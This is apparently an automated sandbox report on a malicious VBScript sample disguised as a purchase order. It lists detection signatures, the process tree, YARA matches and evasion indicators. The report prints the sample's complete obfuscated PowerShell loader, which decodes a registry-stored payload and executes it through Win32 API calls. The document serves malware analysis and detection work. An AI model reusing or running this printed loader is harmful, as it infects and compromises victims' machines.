Windows Analysis Report
SIEM_PO00938467648.vbs

Overview

General Information

Sample Name: SIEM_PO00938467648.vbs
Analysis ID: 756154
MD5: 633811bccf3fe62978ce41a04b653083
SHA1: bc81307b5c229094617e7cb8cdcaec55eaddad36
SHA256: b5e4225737f935940fa23989440d5ea2c123c8affde25d6d7224e2b4abab5608
Tags: vbs

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Dot net compiler compiles file from suspicious location
VBScript performs obfuscated calls to suspicious functions
Antivirus detection for URL or domain
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Very long command line found
Potential evasive VBS script found (use of timer() function in loop)
Obfuscated command line found
Machine Learning detection for dropped file
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

  • System is w10x64
  • wscript.exe (PID: 8 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SIEM_PO00938467648.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • cmd.exe (PID: 2976 cmdline: CMD.EXE /c echo C:\Windows MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 1516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 2528 cmdline: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = """LaABrdGedGa-StTDiyCopsteUn St-UdThoyAupepeWrDReeTrfPaiUsnUmiRetCoiMaoFrnSv Sm'ReuSksUniFunCogKn ToSPhyPrsJatNueSimst;viuSmsPriSknangIm PrSPlyEusGrtgueoemFo.ReRPuuConHutSoiFrmFreIl.JoIFonSntSneLurCooPapJaSTreRerElvKuiticReeFesBr;AmpUpuKobsnlVoiDecAw sasRutRhajetaaiTecSv BrcEslFoaUnsVasLe EbTInuBaeBaiOurCeoKonPr1Ci Sh{Ti[PhDAflUllBuIMimHapMaoAfrEutAn(ad`"""InuLusKieKarMe3Br2Si`"""Rr)Ri]GopMauFlbStlMeiTycSa AesKatInaHjtSmiSvcNe SteHoxattImeTerOpnNa GriBenBrtNo YdDMieResTotEnrBroStyOvCspaMerMieCotKl(sn)Me;Sm[AfDEplLulReIenmFlpRdoHarEgtBr(Ov`"""MigAldMeiPl3In2Er`"""Te)Ce]tapEuuDrbCulMaiHjcAs LgsUdtTraBrtSqiercCo VieBexTetVeetrrHrnMa FoiBanArtHa StSBrcUdaGrlLaeSkWTeiScnSudReoBuwCrEVexChtstESuxKn(NoiFinKutSe MoDLnrIgiBefRatPl,ReiAnnAltJu BeAUdmAmbMiuPalHeaAp,DiiFonKntSp juBpraSesVaoQu,MaiLenImtBa NoiAfaDagVrtPotSyaOv,ChiGenpltRe diVSaeTvjSimboaSotAn1Un5Fr8Ud,GiiTinSttEr YeMSucSlgKurSk)Eg;Ak[KuDDilBulImIRdmAmpAnoVarPrtFr(Sk`"""SvkSqeRorpinFleRelPa3Ov2as`"""Tr)Wo]hepMeuRobBalFriLucRe HysMitFoaUntTaiTmcJa aneDexMitKueSarBlnOi ReiFanSutov drHDeeStaBapBlSBeiSpzBaeKo(StiUnnDitOu YcPKerBroUrpRe,PhiSonxatCl AiANodStrCheFosOv,ViiDenJutDi MuTImoWerArtInrfriPo)Mo;Co[SlDOplSalSpIApmunpReoSjrRotKo(wh`"""JgsSchdieBilShlko3Ge2re.VadUflOmlUn`"""St)Un]BepPauSlbOslBeiUncAs MasMntSyaLetFriTrcpr NoeVixRatFoeRerWenun SevEnofuiTrdRh PaDterFlaFigMeFCiiEnnStiKasBehMi(EsiBonSutPo OpOMumPldSerGe)Ba;Ej[SpDFalBelMeILimhepFroUdrGutAu(Je`"""mawSkifanTemNumIn.ApdKolBolFl`"""Fu)Ho]ScpOvuPrbMdlViiAlcBa BosSatAsaHotLiiFocSi VeeNoxLutHaeBirJenLa HoiennNatGu ArmtjiHoxSceDarTrGSwejotCoDTreFivSuCKeaMipqusSu(SkiBlnCitCh BeNPriBrtSerUd,UditinCotJo VaFaseEwlOb,ThivinQutEo NoAPhfAfsXi9Im3Bl)Ta;Ls[ChDCulCalHaIPumCipIcoFarRetSl(Be`"""RekGleTrrhinAteSilEk3Sa2ur`"""Ti)De]PapFeuDrbFolOpiLkcTn BusAbtSyaUdtMeiSocfr CoeImxFatMoeFrrnanto triMenTotAl KaLUdoEscAskQuRosepasphoOvuForJucApeph(RoiAfnCotTe 
VeLExeSoiUn)Ir;Un[ReDPilIwlOyILammipShoStrFatCr(Bo`"""FlkAueCervanToeJelAv3Pl2Re`"""Se)Co]UnpAnuCobOplFoilacLa CasrotOpaUntMuiKacTi WieKnxEntReeUdrTrnTr AriPonIntSl PiVIniStrpetrauAcaTilvaATelBelCloThcFa(TriStnSotWi GevGr1Sk,SmiLunThtOr CavBl2Ne,KeiStnCotBy Hevdr3pa,HeiGanUptku SvvCa4In)pr;Py[DrDMalInlPrIBrmHepPloKnrPttba(Ho`"""CrAUnDBeVAlAToPanICr3St2Ph.WaDBeLSaLCi`"""To)Un]StpTiuRebSylPuiEncFo CosMotUnaUntHuiAtcst MeeMixDotOfeAdrInnRo SuvBeoUpiVidTi CiMTraBipBeGAteOenSleGlrPriBrcCoMFiaUnsAnkVn(SaiSknMetPe PlBInrTriOdnObkIr,DoiDenQutRu CaMChiUddtitKnsSn)In;Ov[TrDRelSelFuIUnmRipGoosurOmtSc(Ve`"""BrkVaeMerManPeeSklSt3Co2In`"""ef)Ce]BepKouMybKolLbiCocUn EdsGatKuaTetKoiaacLu NoeVexPrtNeeUnrAnnCy PrISenLvtPlPFotBorkr ScEGanSuumemfuSChyFrsPotBeeOomFjLGuoFlcSraNelGaeVosPrWUn(PauDiiEynSttPe GrvEx1ma,PsiHanKotEn KovGr2Ha)Et;Om[OoDrhlDilFlIsumEnpSkoOvrTrtSp(St`"""ObkEdeElrRenTaeDalDi3Sc2Di`"""Si)Ni]FopChuTlbDalCaiAlcLi SmsNytvaaretPriSucTr LueBexGatTreGerManbr ReiGunentAn UnSGieUntTiTEnhPorBieSoaVadEmABlfPafPaiChnFeimitSpySlMPraNisBrkab(CeiNgnCatCr teRBeedebOuuFoiAflUn,BriSlnFitBa SuSTeeAnmHeiDasRr)Ho;Ba[TrDTrlSplVaIMamSapMaoCortitPr(Ud`"""StuNosKoeJorEl3En2Sp`"""St)Bu]chpReuBlbGulFliCacUn OusOutScaUntGoiRecor SteabxArtcheSerBunFo PoiRenJotMi SpSKoeAftJuMEmeInnReuBjIPrtFieStmXeIHongefFeoSi(OpiTrnmotSu ReCRhaBlbBrrSoiSk,AaiDonSktDo reOTepFiaNolUt,UniBunSutFl ClHskaFoaEn,whiHinSptIn GaARemCopFluPr)Ti;Ge}As'Et;Sp`$SpTPtuDueudiKorTooTonPi3Lu=Oo[JgTShuAueAuiFrrAcoovnRe1Bi]Ac:Do:LiVAnikdrBltniuSwaNolWeAStldelNooFocFo(Va0Co,Dr1Un0Ha4An8In5Un7Im6He,al1En2Pr2Ek8St8Gu,Bl6Co4Un)Pe;Ro`$ProFurUpnSaiBetTrhProAasChaBruDarTiiEsaSlnKi=Fi(EkGReeustDe-PrIDetBeeRemSkPGurPloPipReeStrSktMiyOt Ej-JePVeaMatrehTr Sn'EfHPrKTrCuaUSp:Vi\DePgoeMidpnaMigunoOvgCl\ReDCaeVofHmiIbbZerHaiFolSolcoaBatRaiChoPunoveBlnDosMo'Sk)Le.CaELilPluFrtFoiPyoFrnQu;ir`$PoiTanPotGouCurBinHveSidAl Po=sp 
er[PrSAeyKosIntUneTymTi.LuCGaoUbnDavTheAarIntNe]Ox:Zi:ApFGurMuoCamSoBAwaResFreHo6Sa4StSNitLnrUniGunUngFo(St`$ApobjrAunCriIntCohUnoPosUnaKeuMarAniNoaUnnAr)Fo;Sk[TrSEjyAfsVitWaeTimre.GeRGnuFonUntStiKrmUneJo.trILenSatHeeGorsioLopSeSSteDarchvMeiBicBoeEssAj.FeMBraAprNjsFohUnaUnlBa]Me:Ov:haCUdoBrpFjyBr(Ne`$DaiKanBetSluAnrOmnLgePidRe,Sc Fe0yo,Su Na Ko`$PeTMuuUneLiizirEmoannin3Do,Ci Pl`$RiiXanMitSpuSorThnTeeRedMa.SocAloStuRhnKotsp)Ta;Un[FaTKouveeLsifarNooPrnFr1st]Be:Dy:EsEManNouUnmboSUnyTisAstDieMomViLTeoBecDeaUrlBueUnsNoWUn(Po`$AbTPruSyePriAurSkoSinPr3Sk,Uk St0Ha)Ug#Sm;""";Function Tueiron4 { param([String]$sheikdmmerne); For($circumtropical=2; $circumtropical -lt $sheikdmmerne.Length-1; $circumtropical+=(2+1)){ $Driblende = $Driblende + $sheikdmmerne.Substring($circumtropical, 1); } $Driblende;}$Reptilious0 = Tueiron4 'DaIKgEtiXSk ';$Reptilious1= Tueiron4 $Biliate;&$Reptilious0 $Reptilious1;; MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 2188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 4184 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
        • cvtres.exe (PID: 6012 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8B47.tmp" "c:\Users\user\AppData\Local\Temp\jadyuuoq\CSC891590C19254105A6A792E8745AF5FD.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • cleanup
No configs have been found
Source | Rule | Description | Author
SIEM_PO00938467648.vbs | WScript_Shell_PowerShell_Combo | Detects malware from Middle Eastern campaign reported by Talos | Florian Roth
Strings:
  • 0xa35:$s1: .CreateObject("WScript.Shell")
  • 0x3e4db:$p1: powershell.exe
  • 0x4b22c:$p1: powershell.exe
Source | Rule | Description | Author
Process Memory Space: powershell.exe PID: 2528 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
Strings:
  • 0xc14e:$b2: ::FromBase64String(
  • 0xd089:$b2: ::FromBase64String(
  • 0x15f18:$b2: ::FromBase64String(
  • 0x104597:$b2: ::FromBase64String(
  • 0x10b6f5:$b2: ::FromBase64String(
  • 0x33c33:$s1: -join
  • 0x40d08:$s1: -join
  • 0x440da:$s1: -join
  • 0x4478c:$s1: -join
  • 0x4627d:$s1: -join
  • 0x48483:$s1: -join
  • 0x48caa:$s1: -join
  • 0x4951a:$s1: -join
  • 0x49c55:$s1: -join
  • 0x49c87:$s1: -join
  • 0x49ccf:$s1: -join
  • 0x49cee:$s1: -join
  • 0x4a53e:$s1: -join
  • 0x4a6ba:$s1: -join
  • 0x4a732:$s1: -join
  • 0x4a7c5:$s1: -join
Source | Rule | Description | Author
amsi64_8.amsi.csv | WScript_Shell_PowerShell_Combo | Detects malware from Middle Eastern campaign reported by Talos | Florian Roth
Strings:
  • 0x1a:$s1: .CreateObject("WScript.Shell")
  • 0x72:$s1: .CreateObject("WScript.Shell")
  • 0x1da:$p1: powershell.exe

Data Obfuscation

Source: Process started | Author: Joe Security | Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = ... (obfuscated PowerShell command line, given in full in the process tree above)
No Snort rule has matched

AV Detection

Source: SIEM_PO00938467648.vbs | ReversingLabs: Detection: 34%
Source: http://pesterbdd.com/images/Pester.png7z | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.dll | Joe Sandbox ML: detected
Source: Binary string: ,l7C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.pdb | source: powershell.exe, 00000003.00000002.833248284.00000000053E0000.00000004.00000800.00020000.00000000.sdmp
Source: powershell.exe, 00000003.00000002.820596079.000000000319B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000003.00000003.499891635.0000000007E61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000003.485360796.0000000007E5D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsof
Source: powershell.exe, 00000003.00000002.843893534.0000000005CFF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.825069485.0000000004DDE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.825069485.0000000004DDE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png7z
Source: powershell.exe, 00000003.00000002.823390885.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.825069485.0000000004DDE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.825069485.0000000004DDE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html7z
Source: powershell.exe, 00000003.00000002.843893534.0000000005CFF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.843893534.0000000005CFF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.843893534.0000000005CFF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.825069485.0000000004DDE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.825069485.0000000004DDE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester7z
Source: powershell.exe, 00000003.00000002.843893534.0000000005CFF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe

System Summary

Source: Process Memory Space: powershell.exe PID: 2528, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = ... (obfuscated PowerShell command line, given in full in the process tree above)
Source: Initial file | semirattlesnake.ShellExecute Angularises, " " & chrw(34) & Eu8 & chrw(34), "", "", 0
Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 4728
Source: SIEM_PO00938467648.vbs, type: SAMPLE | Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: amsi64_8.amsi.csv, type: OTHER | Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: powershell.exe PID: 2528, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_03265E18
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_03268F48
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process Stats: CPU usage > 98%
Source: SIEM_PO00938467648.vbs | Initial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SIEM_PO00938467648.vbs"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = ... (obfuscated PowerShell command line, given in full in the process tree above)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8B47.tmp" "c:\Users\user\AppData\Local\Temp\jadyuuoq\CSC891590C19254105A6A792E8745AF5FD.TMP"
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_25cruns3.fyd.ps1
Source: classification engine | Classification label: mal100.expl.evad.winVBS@11/9@0/0
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll (3 occurrences)
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1516:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2188:120:WilError_01
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SIEM_PO00938467648.vbs"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: Binary string: ,l7C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.pdb source: powershell.exe, 00000003.00000002.833248284.00000000053E0000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: WScript.Shell");IWshShell3.Exec("CMD.EXE /c echo %windir%");IHost.CreateObject("WScript.Shell");IWshShell3.Exec("CMD.EXE /c echo %windir%");IWshExec.StdOut();ITextStream.ReadLine();IWshShell3.RegWrite("HKEY_CURRENT_USER\Pedagog\Defibrillationens\Elution", "cQGbcQGbuoYnrofrAswC6wKhHIHChsedPXEBm3EBm4HqEDNKxXEBm3EBm3EBm+sCgfTrTOsC", "REG_SZ");IFileSystem3.FileExists("C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe");IShellDispatch6.ShellExecute("C:\Windows\syswow64\WindowsPowerShell\v", " "$Biliate = """LaABrdGedGa-StTDiyCopst", "", "", "0")
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = """LaABrdGedGa-StTDiyCopsteUn St-UdThoyAupepeWrDReeTrfPaiUsnUmiRetCoiMaoFrnSv Sm'ReuSksUniFunCogKn ToSPhyPrsJatNueSimst;viuSmsPriSknangIm PrSPlyEusGrtgueoemFo.ReRPuuConHutSoiFrmFreIl.JoIFonSntSneLurCooPapJaSTreRerElvKuiticReeFesBr;AmpUpuKobsnlVoiDecAw sasRutRhajetaaiTecSv BrcEslFoaUnsVasLe EbTInuBaeBaiOurCeoKonPr1Ci Sh{Ti[PhDAflUllBuIMimHapMaoAfrEutAn(ad`"""InuLusKieKarMe3Br2Si`"""Rr)Ri]GopMauFlbStlMeiTycSa AesKatInaHjtSmiSvcNe SteHoxattImeTerOpnNa GriBenBrtNo YdDMieResTotEnrBroStyOvCspaMerMieCotKl(sn)Me;Sm[AfDEplLulReIenmFlpRdoHarEgtBr(Ov`"""MigAldMeiPl3In2Er`"""Te)Ce]tapEuuDrbCulMaiHjcAs LgsUdtTraBrtSqiercCo VieBexTetVeetrrHrnMa FoiBanArtHa StSBrcUdaGrlLaeSkWTeiScnSudReoBuwCrEVexChtstESuxKn(NoiFinKutSe MoDLnrIgiBefRatPl,ReiAnnAltJu BeAUdmAmbMiuPalHeaAp,DiiFonKntSp juBpraSesVaoQu,MaiLenImtBa NoiAfaDagVrtPotSyaOv,ChiGenpltRe diVSaeTvjSimboaSotAn1Un5Fr8Ud,GiiTinSttEr YeMSucSlgKurSk)Eg;Ak[KuDDilBulImIRdmAmpAnoVarPrtFr(Sk`"""SvkSqeRorpinFleRelPa3Ov2as`"""Tr)Wo]hepMeuRobBalFriLucRe HysMitFoaUntTaiTmcJa aneDexMitKueSarBlnOi ReiFanSutov drHDeeStaBapBlSBeiSpzBaeKo(StiUnnDitOu YcPKerBroUrpRe,PhiSonxatCl AiANodStrCheFosOv,ViiDenJutDi MuTImoWerArtInrfriPo)Mo;Co[SlDOplSalSpIApmunpReoSjrRotKo(wh`"""JgsSchdieBilShlko3Ge2re.VadUflOmlUn`"""St)Un]BepPauSlbOslBeiUncAs MasMntSyaLetFriTrcpr NoeVixRatFoeRerWenun SevEnofuiTrdRh PaDterFlaFigMeFCiiEnnStiKasBehMi(EsiBonSutPo OpOMumPldSerGe)Ba;Ej[SpDFalBelMeILimhepFroUdrGutAu(Je`"""mawSkifanTemNumIn.ApdKolBolFl`"""Fu)Ho]ScpOvuPrbMdlViiAlcBa BosSatAsaHotLiiFocSi VeeNoxLutHaeBirJenLa HoiennNatGu ArmtjiHoxSceDarTrGSwejotCoDTreFivSuCKeaMipqusSu(SkiBlnCitCh BeNPriBrtSerUd,UditinCotJo VaFaseEwlOb,ThivinQutEo NoAPhfAfsXi9Im3Bl)Ta;Ls[ChDCulCalHaIPumCipIcoFarRetSl(Be`"""RekGleTrrhinAteSilEk3Sa2ur`"""Ti)De]PapFeuDrbFolOpiLkcTn BusAbtSyaUdtMeiSocfr CoeImxFatMoeFrrnanto 
triMenTotAl KaLUdoEscAskQuRosepasphoOvuForJucApeph(RoiAfnCotTe VeLExeSoiUn)Ir;Un[ReDPilIwlOyILammipShoStrFatCr(Bo`"""FlkAueCervanToeJelAv3Pl2Re`"""Se)Co]UnpAnuCobOplFoilacLa CasrotOpaUntMuiKacTi WieKnxEntReeUdrTrnTr AriPonIntSl PiVIniStrpetrauAcaTilvaATelBelCloThcFa(TriStnSotWi GevGr1Sk,SmiLunThtOr CavBl2Ne,KeiStnCotBy Hevdr3pa,HeiGanUptku SvvCa4In)pr;Py[DrDMalInlPrIBrmHepPloKnrPttba(Ho`"""CrAUnDBeVAlAToPanICr3St2Ph.WaDBeLSaLCi`"""To)Un]StpTiuRebSylPuiEncFo CosMotUnaUntHuiAtcst MeeMixDotOfeAdrInnRo SuvBeoUpiVidTi CiMTraBipBeGAteOenSleGlrPriBrcCoMFiaUnsAnkVn(SaiSknMetPe PlBInrTriOdnObkIr,DoiDenQutRu CaMChiUddtitKnsSn)In;Ov[TrDRelSelFuIUnmRipGoosurOmtSc(Ve`"""BrkVaeMerManPeeSklSt3Co2In`"""ef)Ce]BepKouMybKolLbiCocUn EdsGatKuaTetKoiaacLu NoeVexPrtNeeUnrAnnCy PrISenLvtPlPFotBorkr ScEGanSuumemfuSChyFrsPotBeeOomFjLGuoFlcSraNelGaeVosPrWUn(PauDiiEynSttPe GrvEx1ma,PsiHanKotEn KovGr2Ha)Et;Om[OoDrhlDilFlIsumEnpSkoOvrTrtSp(St`"""ObkEdeElrRenTaeDalDi3Sc2Di`"""Si)Ni]FopChuTlbDalCaiAlcLi SmsNytvaaretPriSucTr LueBexGatTreGerManbr ReiGunentAn UnSGieUntTiTEn
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_03261059 push eax; mov dword ptr [esp], edx 3_2_0326106C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.dll
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX (3 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (90 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX (13 occurrences)

Malware Analysis System Evasion

Source: Initial file | Initial file: do while timer-temp<sec
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1668 | Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (2 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8782
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: powershell.exe, 00000003.00000002.833621098.0000000005416000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V
Source: powershell.exe, 00000003.00000002.827196045.0000000004F35000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ,l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V-c
Source: powershell.exe, 00000003.00000002.833621098.0000000005416000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ,l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
